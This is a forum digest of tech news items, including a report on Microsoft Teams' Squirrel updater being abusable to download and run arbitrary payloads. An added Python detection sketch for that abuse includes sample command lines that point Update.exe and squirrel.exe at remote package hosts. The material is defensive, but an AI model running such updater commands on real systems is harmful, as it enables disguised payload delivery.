
The update mechanism as it is currently implemented in the Microsoft Teams desktop app allows downloading and executing arbitrary files on the system. The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers, but there it can be used only to download a payload. These applications rely on the open source Squirrel project to manage installation and updating routines, which uses the NuGet package manager to create the necessary files. Multiple security researchers discovered that by using the 'update' command for a vulnerable application, it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.' With Microsoft Teams, a payload is added to its folder and executed automatically using certain commands. These commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location. The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts database on GitHub. Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point, as Microsoft informed the researcher that the fix would come in a future release of the software. Trying to replicate the effect with GitHub, WhatsApp, and UiPath did not achieve execution of the payload; only downloading it from a remote server was possible. "In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer. If you use Microsoft Teams, you surely want to learn more about this security infraction and visit OUR FORUM.
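A detection sketch for the updater abuse described in the item above, added here as an example and not taken from the article or from the Squirrel project: it flags process-creation events where `Update.exe` or `squirrel.exe` is run with the 'update' or 'download' command against a package source outside an allow-list. The `--update`/`--download` switch spellings, the allow-listed host, and the sample events are assumptions constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Updater binaries named in the article.
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
# Assumed switch spellings for the 'update' and 'download' commands.
SWITCH = re.compile(r'--(update|download)(?:=|\s+)("[^"]+"|\S+)', re.I)
# A source counts as remote if it is an http(s) URL or a UNC path.
REMOTE = re.compile(r"^(?:https?://|\\\\)", re.I)
# Hypothetical allow-list: the only host your updaters should ever contact.
ALLOWED_HOSTS = {"updates.example.internal"}


def classify(image, command_line):
    """Return (verdict, command, source) for a suspicious updater run, else None."""
    if PureWindowsPath(image).name.lower() not in SQUIRREL_BINARIES:
        return None
    match = SWITCH.search(command_line)
    if match is None:
        return None  # e.g. the normal application start
    command = match.group(1).lower()
    source = match.group(2).strip('"')
    if not REMOTE.match(source):
        # Local package folder: something was staged on disk, needs a human look.
        return ("review", command, source)
    host = re.split(r"[/\\:]", REMOTE.sub("", source), maxsplit=1)[0].lower()
    if host in ALLOWED_HOSTS:
        return None
    return ("alert", command, source)


# Constructed process-creation events: (image path, command line).
TEAMS = r"C:\Users\alice\AppData\Local\Microsoft\Teams"
EVENTS = [
    (TEAMS + r"\Update.exe", 'Update.exe --processStart "Teams.exe"'),
    (TEAMS + r"\Update.exe", "Update.exe --update=http://198.51.100.7/pkg"),
    (TEAMS + r"\current\squirrel.exe", r"squirrel.exe --download \\203.0.113.9\share\pkg"),
    (TEAMS + r"\Update.exe", "Update.exe --update https://updates.example.internal/teams"),
    (TEAMS + r"\Update.exe", r"Update.exe --update=C:\Users\alice\AppData\Local\Temp\pkg"),
]


def scan(events):
    """Classify every event and keep only the findings."""
    return [hit for hit in (classify(i, c) for i, c in events) if hit]


if __name__ == "__main__":
    for verdict, command, source in scan(EVENTS):
        print(f"{verdict:6} {command:8} {source}")
```

In production the same logic would run over Sysmon Event ID 1 or EDR process telemetry, with the allow-list populated from the update feeds your deployed applications are actually configured to use.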

Some Windows 10 users are seeing notifications from Microsoft that their devices are temporarily blocked from receiving the Windows 10 1903 update. There have been some bugs and issues with Microsoft's Windows 10 May Update/1903 feature update since Microsoft kicked off its rollout in late May. But the 1903 complaint I've gotten most often (so far) is from users who want to install the update but can't and don't know why. Microsoft has added a new notification which some users whose devices aren't ready or able to install the update are seeing when they attempt to proactively grab the 1903 release. As originally noted last week by Windows Latest, Microsoft has added a new message to its Windows Update page. Users attempting to install 1903 on machines with out-of-date drivers or other issues are seeing this message: "The Windows 10 May 2019 Update is on its way. We're offering this update to compatible devices, but your device isn't ready for it. Once your device is ready, you'll see the update available on this page. There's nothing you need to do at this time." I confirmed with Microsoft that this notification is part of its 1903 rollout strategy. "The notification started with the latest changes made to improve the quality/transparency of the Windows update process," according to a Microsoft spokesperson. Microsoft officials said in a blog post on May 21 that the company planned to start automatically updating devices running the April 2018 Update and earlier versions of Windows 10 to Windows 10 1903. Last week, via the Windows Update account on Twitter, Microsoft officials communicated that they were building and training machine-learning rollout processes that would enable this to happen. Details on exactly when and how Microsoft plans to do this are scarce. More information on the automatic-update plan is posted on OUR FORUM.

Office 365 consumer subscribers soon will be able to buy up to an extra 1TB of storage for a fee. And OneDrive web, mobile, and Windows 10 PC users are getting a new secure-storage feature for no additional charge. Microsoft is bringing a new storage plan and security options to the consumer version of its OneDrive cloud storage service. On June 25, Microsoft announced new paid OneDrive Personal plans for OneDrive consumer customers and Office 365 consumer subscribers; and its OneDrive Personal Vault feature. Microsoft is increasing the storage baseline for OneDrive Personal users who currently pay $1.99 a month for 50 GB of storage. Now, these users will get 100 GB of cloud storage for the same $1.99 a month fee. The extra storage will be added "soon" to those users' accounts without them needing to take any action, officials said. Microsoft also finally is enabling Office 365 consumer subscribers to buy more OneDrive storage. As part of their current Office 365 Home or Personal subscriptions, users already get 1TB of OneDrive storage per user for no additional cost. These users are going to be able to buy more storage in 200 GB increments for $1.99 per month, up to 1TB of additional storage for $9.99 per month. The new total maximum of storage that Microsoft is making available is 2TB; there are currently no plans to offer more, said Seth Patton, General Manager of Microsoft 365. These new additional storage options will be made available worldwide "in the coming months," Patton said. For those who have multiple users with 1TB each under their Office 365 Home plan, only the primary account holder is eligible for the extra storage purchase. For more visit OUR FORUM.

Google Earth has been available on desktop for over two years now, and if you want to run the platform in a browser, you have to use Google’s Chrome. Other browsers including Chromium Edge and Opera aren’t supported because Google built Earth using Chrome-only technology. Google Earth is now available for all major web browsers, including Microsoft Edge and Firefox. Google created the Earth web version using Portable Native Client (or PNaCl), and neither the original Edge nor Chromium-based Edge ships with the Portable Native Client (PNaCl) component. Google has been working on a WebAssembly-powered Google Earth, and a version built using WebAssembly was demonstrated during the Chrome Dev Summit 2017. Google Earth has finally been rewritten in WebAssembly and the beta version now works on Microsoft Edge, Chromium web browsers and Firefox. The new version of Google Earth offers the same experience as the existing site. “Once the new version of Edge based on Chromium ships, apps in WebAssembly will work as well in Edge as they do in Chrome,” Google said in a blog post. While Google Earth works smoothly in new Edge, the platform is not fully supported in old Edge as the browser does not have Google Earth WebAssembly (WASM) Beta. Google Earth in old Edge renders the unsupported warning, but you can try to run it in the multi-threaded or single-threaded version, and it may work. We have more plus the link to try Google Earth posted on OUR FORUM.

Having your identity stolen can be a nightmare, and cleaning up the mess can take months. You can make life difficult for a would-be identity thief by locking down these five key aspects of your online life. What happened to my ZDNet colleague Matthew Miller this month is the stuff nightmares are made of. The title pretty much says it all: "SIM swap horror story: I've lost decades of data and Google won't lift a finger." In Matthew's case, hackers were able to convince T-Mobile to issue a replacement SIM that gave them access to his primary phone number. That, in turn, allowed them to reset passwords on his Gmail account, which pretty much gave them unfettered access to his entire identity. They then proceeded to shut down his Twitter account, wipe out everything associated with his Google account, and even access his online banking accounts. As I read Matthew's story, I had flashbacks to a similar incident that happened to Mat Honan back in 2012. Honan, who's now San Francisco Bureau Chief for Buzzfeed, documented his excruciating experience at the time in a memorable Wired article: "How Apple and Amazon Security Flaws Led to My Epic Hacking." The lesson from both of these horrifying experiences is that your primary phone number and your primary email address are far more valuable than you think. As our reliance upon online services grows, these two data points are extremely common means of authentication. If either one is compromised, an attacker can do bad things. And if those two factors are tied too closely together, it's game over for your online identity. You don't have to be the next victim. With a little effort (and, yes, a little expense), you can lock down the security of crucial online services. Follow these five guidelines and you can make life extremely difficult for a would-be identity thief. Fight hackers with 5 security safeguards we have posted on OUR FORUM.

Back in the day, Microsoft seemingly kept a long list of enemies otherwise known as competitors, as the company’s product portfolio grew in ambition. However, the days of vindictive and arguably petty Microsoft seem to be behind the company as its enemies list shrinks and its collaboration roster expands, yet, there are still a few areas where the company keeps a healthy competitive nature and to that end, some software, services, and companies remain on a figurative and literal blacklist. According to a report from GeekWire, not only does Microsoft have a figurative blacklist, there is a literal blacklist of products that have been obtained and services from the following companies are frowned upon in internal use by the Redmond-based software company including obvious names such as Amazon Web Services and Kaspersky as well as a few head-scratchers in Grammarly and GitHub. Perhaps, the most noteworthy exclusions come from recent IPO darling Slack, to which Microsoft offers a competitor product in its Teams communication service. Unlike its more neutral stance on cross-platform usage and development, Microsoft seems to be taking an active role in discouraging and even prohibiting the use of Slack by company employees. We have some of this prohibited software posted on OUR FORUM.